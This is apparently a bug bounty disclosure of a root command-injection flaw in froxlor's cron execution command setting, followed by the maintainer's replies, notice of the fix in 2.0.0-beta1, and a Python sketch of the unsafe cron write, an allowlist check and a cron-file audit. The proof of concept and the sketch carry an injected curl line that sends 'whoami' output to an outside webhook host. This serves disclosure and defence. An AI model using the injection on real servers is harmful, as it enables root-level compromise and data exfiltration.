Cron execution command field allows attackers with admin privilege to execute OS command as root in froxlor/froxlor

Valid

Reported on

Dec 19th 2022


Description

  • The value of the "Cron execution command" setting is written into the cron file verbatim, without any validation or escaping.
  • An attacker who has gained admin access can therefore run OS commands as root.

Proof of Concept

1/ Navigate to http://webserver/froxlor/admin_settings.php?page=overview&part=crond

2/ In the Cron execution command field, paste a command followed by a semicolon. For example:

curl http://<your webhook site>/`whoami`;

3/ The cron file on the server is updated after a few minutes

4/ The whoami command is executed and returns the root user

Impact

If an attacker has admin access, he/she can execute OS commands as root on the server.
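As an added illustration (not froxlor's code, which is PHP, and not the fix in commit 795a3d), the sketch below contrasts the unsafe write the report describes with an allowlist check on the setting and an audit of an existing cron file. The cron line shape, the script path and the webhook host are assumptions for the example.

```python
import re

# Constructed samples: a benign interpreter path and the injected value from the
# report, with the webhook host replaced by a placeholder.
BENIGN_CMD = "/usr/bin/php"
INJECTED_CMD = "curl http://WEBHOOK-PLACEHOLDER/`whoami`;"

# Hypothetical script path; the report does not show froxlor's real cron file layout.
CRON_SCRIPT = "/var/www/froxlor/scripts/froxlor_master_cronjob.php"

# Allowlist for the setting: one absolute path made only of path characters. This
# excludes every shell metacharacter and also '%', which crontab(5) turns into a newline.
EXEC_CMD_RE = re.compile(r"/[A-Za-z0-9._/-]+")
# Shape the whole command field has when it was built from a valid setting.
CRON_CMD_RE = re.compile(r"/[A-Za-z0-9._/-]+ /[A-Za-z0-9._/-]+( > /dev/null 2>&1)?")

def build_cron_line(exec_cmd, script=CRON_SCRIPT):
    # Vulnerable construction as the report describes it: the setting value is
    # interpolated verbatim into a line that runs as root.
    return f"*/5 * * * * root {exec_cmd} {script} > /dev/null 2>&1"

def validate_exec_cmd(value):
    """True only when the value is a bare absolute path with no shell metacharacters."""
    return bool(value) and EXEC_CMD_RE.fullmatch(value) is not None

def build_cron_line_safe(exec_cmd, script=CRON_SCRIPT):
    # Hardened form: refuse to write the cron file unless the setting passes the allowlist.
    if not validate_exec_cmd(exec_cmd):
        raise ValueError("cron execution command rejected: must be an absolute path "
                         "with no shell metacharacters")
    return build_cron_line(exec_cmd, script)

def audit_cron_file(text):
    """Return 1-based numbers of lines whose command field does not have the expected
    '<interpreter> <script>' shape, i.e. where the stored setting may carry extra commands."""
    flagged = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 6)  # five time fields, user, then the command
        if len(fields) < 7 or CRON_CMD_RE.fullmatch(fields[6]) is None:
            flagged.append(n)
    return flagged

if __name__ == "__main__":
    bad = build_cron_line(INJECTED_CMD)
    print(bad)  # curl runs first, then the real script, both as root
    print(audit_cron_file("\n".join([build_cron_line(BENIGN_CMD), bad])))  # [2]
```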

We are processing your report and will contact the froxlor team within 24 hours. a year ago
We have contacted a member of the froxlor team and are waiting to hear back a year ago
Michael
a year ago

Maintainer


Please read our security policy; only reports for the upcoming version 2 can be processed

Michael
a year ago

Maintainer


and by NO means is that a CRITICAL severity as you have to have administrative privileges

Khang Tran modified the report
a year ago
Khang Tran
a year ago

Researcher


Thanks for your feedback. I have updated the report. The reason I thought it was a critical severity is because an attacker can fully compromise the system if they successfully exploit this vulnerability.

Michael Kaufmann validated this vulnerability a year ago
benasin has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Michael Kaufmann marked this as fixed in 2.0.0-beta1 with commit 795a3d a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago